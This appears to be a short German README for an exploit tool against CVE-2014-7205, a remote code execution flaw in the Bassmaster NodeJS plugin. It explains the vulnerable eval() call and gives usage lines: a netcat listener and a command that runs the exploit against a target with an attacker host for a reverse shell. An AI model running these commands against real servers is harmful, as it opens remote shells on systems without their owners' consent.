
Bassmaster Plugin NodeJS RCE
bassmaster-rce.py: Ein Python-Skript zur Ausnutzung von CVE-2014-7205. nodeshell.py: Ein Python-Modul zum Erzeugen einer Reverse Shell für NodeJS
!!Nur gegen Server verwenden, auf denen Sie die Erlaubnis zum Testen haben
CVE-2014-7205 ist eine Schwachstelle zur Remote-Code-Ausführung im Bassmaster-Plugin für NodeJS. Alle Versionen <= 1.5.1 sind betroffen. Die Schwachstelle existiert in der Datei lib/batch.js in der Funktion internals.batch, wo ein Aufruf von eval() falsch maskierte Benutzereingaben verwendet (im Grunde prüft der reguläre Ausdruck nicht, ob die Anfragen bösartigen Code enthalten).
nc -lvp 4444python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444